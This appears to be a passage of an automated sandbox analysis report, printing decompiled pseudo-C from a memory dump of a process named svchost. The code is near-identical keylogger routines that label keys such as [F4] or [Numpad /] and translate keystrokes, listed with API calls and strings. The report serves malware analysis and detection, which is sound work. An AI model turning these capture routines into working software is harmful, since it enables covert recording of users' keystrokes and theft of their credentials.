MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Scrol Lock], xrefs: 00C85D94

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B37, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B37(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F18]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F18], xrefs: 00C85B39

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85BD0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BD0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F4]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F4], xrefs: 00C85BD2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C03, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C03(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F7]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F7], xrefs: 00C85C05

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8586D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8586D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad /]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad /], xrefs: 00C8586F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8585C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8585C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad .]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad .], xrefs: 00C8585E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85AD1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AD1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F12]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F12], xrefs: 00C85AD3
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A27, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A27(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Zoom]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
